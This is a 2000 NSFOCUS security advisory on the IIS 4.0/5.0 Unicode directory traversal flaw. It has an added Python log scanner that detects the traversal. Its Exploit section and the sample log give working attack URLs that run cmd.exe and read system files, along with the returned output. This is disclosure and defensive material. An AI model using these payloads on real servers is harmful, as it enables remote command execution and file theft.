NSFOCUS Security Advisory (SA2000-06)
Topic: Microsoft IIS 4.0/5.0 Web Directory Traversal Vulnerability
Release Date: Oct 20, 2000
Affected system:
============
Microsoft IIS 4.0
Microsoft IIS 5.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000
Impact:
======
NSFOCUS security team has found a security flaw in the UNICODE decoding
implementation of Microsoft IIS 4.0/5.0. By exploiting this vulnerability,
a malicious user may be able to run arbitrary commands or read the content
of system files on a web server running vulnerable IIS, remotely.
Description:
=========
When IIS 5.0 (Chinese version) finds "%c1%hh" or "%c0%hh" (0x00 <= 0xhh
< 0x40) in a file name, it decodes "%c1%hh" to (0xc1 - 0xc0) * 0x40 + 0xhh,
and "%c0%hh" to (0xc0 - 0xc0) * 0x40 + 0xhh.
For example (Windows 2000 + IIS 5.0 + SP1, Simplified Chinese version):
http://target/A.ida/%c1%00.ida
IIS says "@.ida" can't be found
here: (0xc1 - 0xc0) * 0x40 + 0x00 = 0x40 = '@'
http://target/A.ida/%c1%01.ida
IIS says "A.ida" can't be found
here: (0xc1 - 0xc0) * 0x40 + 0x01 = 0x41 = 'A'
http://target/A.ida/%c1%02.ida
IIS says "B.ida" can't be found
.....
http://target/A.ida/%c0%21.ida
IIS says "!.ida" can't be found
....
This means most characters can be encoded with this feature.
For example:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'
So an attacker can bypass the IIS check for "..\" with this trick.
It is possible to run arbitrary commands and read system files.
Note: Rain Forest Puppy (rfp@WIRETRIP.NET) has found the same bug
in IIS for other language versions. All it needs is to change
"%c1%1c" into "%c1%9c", or "%c0%2f" into "%c0%af".
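To make the decoding rule above concrete from the defender's side, here is an added Python example (not part of the NSFOCUS advisory) that implements the advisory's formula, uses it to normalize request paths the way the vulnerable decoder would, and flags traversal requests in web-server log lines. It generalizes the formula slightly: it keeps only the low six bits of the trailing byte (the UTF-8 continuation-byte rule), so that the "%c1%9c" / "%c0%af" variants mentioned in the note decode to the same characters as "%c1%1c" / "%c0%2f". The log lines, their field layout and the client addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# One percent-encoded two-byte lead (0xC0 or 0xC1) followed by a second
# percent-encoded byte, e.g. "%c1%1c" or "%c0%af".
OVERLONG_RE = re.compile(r"%(c[01])%([0-9a-f]{2})", re.IGNORECASE)


def decode_overlong(lead: int, trail: int) -> int:
    """Decode one %cX%hh pair with the advisory's rule:
    (lead - 0xc0) * 0x40 + hh.

    Keeping only the low six bits of the trailing byte (trail & 0x3f) is an
    assumption added here, following the UTF-8 continuation-byte rule; it
    makes %c1%9c and %c0%af decode to the same values as %c1%1c and %c0%2f,
    which matches the note about other language versions of IIS.
    """
    if lead not in (0xC0, 0xC1):
        raise ValueError("only 0xC0/0xC1 lead bytes are handled here")
    return (lead - 0xC0) * 0x40 + (trail & 0x3F)


def normalize_path(raw_path: str) -> str:
    """Turn the overlong pairs into the characters IIS would see, then
    apply ordinary %XX decoding to whatever remains."""
    def _repl(match):
        lead = int(match.group(1), 16)
        trail = int(match.group(2), 16)
        return chr(decode_overlong(lead, trail))
    return unquote(OVERLONG_RE.sub(_repl, raw_path))


def is_traversal(raw_path: str) -> bool:
    """True when the decoded path contains a '..' segment (with either
    separator), i.e. the request escapes the directory the URL starts in."""
    decoded = normalize_path(raw_path).replace("\\", "/")
    path_only = decoded.split("?", 1)[0]
    return any(segment == ".." for segment in path_only.split("/"))


# Constructed IIS-style log lines for the example (not real traffic).
# Field layout assumed here: date time client-ip method uri status.
SAMPLE_LOG = [
    "2000-10-20 10:00:01 192.0.2.10 GET /default.asp 200",
    "2000-10-20 10:00:02 192.0.2.20 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 200",
    "2000-10-20 10:00:03 192.0.2.30 GET /a.asp/..%c0%af../..%c0%af../winnt/win.ini 200",
    "2000-10-20 10:00:04 192.0.2.40 GET /scripts/count.exe?page=1 200",
]


def scan_log(lines):
    """Return (client-ip, raw uri, decoded uri) for every traversal request."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6:
            continue  # skip malformed lines rather than crash on them
        client_ip, uri = fields[2], fields[4]
        if is_traversal(uri):
            hits.append((client_ip, uri, normalize_path(uri)))
    return hits


if __name__ == "__main__":
    for client_ip, raw, decoded in scan_log(SAMPLE_LOG):
        print(f"{client_ip} {raw} -> {decoded}")
```

The important design point is the order of operations: the overlong pairs are decoded before the ordinary percent-decoding and before the ".." check, because a filter that inspects the raw URL for "..\" or "../" (as the vulnerable IIS did) never sees the separator that the decoder later produces.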
Exploit:
=====
(1) Run an arbitrary command:
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
IIS will return something like this:
 Directory of d:\inetpub\scripts
2000-09-28 15:49                      .
2000-09-28 15:49                      ..
1999-07-21 17:49            147,456   Count.exe
2000-09-12 17:08           1438,290   Count25.exe
2000-10-13 15:03             18,867   counter.err
2000-08-23 23:07           1160,002   counter.exe
1999-05-25 18:14             13,925   CountNT.html
1999-07-21 17:49            164,512   extdgts.exe
2000-08-10 15:24            146,352   ism.dll
1999-07-21 17:49            164,512   mkstrip.exe
1999-05-25 18:18             11,317   README.txt
2000-09-28 15:49                      wcount
               9 File(s)    935,233 bytes
(2) The content of some system files can be read with this bug too:
http://target/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS deems it to be a request for an .ASP file, so it calls asp.dll to open
the file win.ini.
For IIS 4.0 + SP6 (Chinese), the URL above fails; it seems that IIS is
getting smarter. But we found, interestingly, that this malformed URL can
be used to trick IIS into returning winnt.ini:
http://target/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
"default.asp" should be an existing .ASP file.
"a.exe" is an arbitrary .EXE file name; it can be a nonexistent file.
Workaround:
=========
1. If executable CGI is not essential, delete the executable virtual
   directories such as /scripts.
2. If an executable virtual directory is needed, we suggest assigning
   a separate local drive for it.
Solution:
=======
Microsoft has released a security bulletin concerning this flaw.
The bulletin is available at:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Patches are available at:
. Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
. Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
DISCLAIMER:
========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE
LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,
CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS
HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR
REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT
MODIFIED IN ANY WAY.
©Copyright 1999-2000 NSFOCUS. All Rights Reserved.
NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)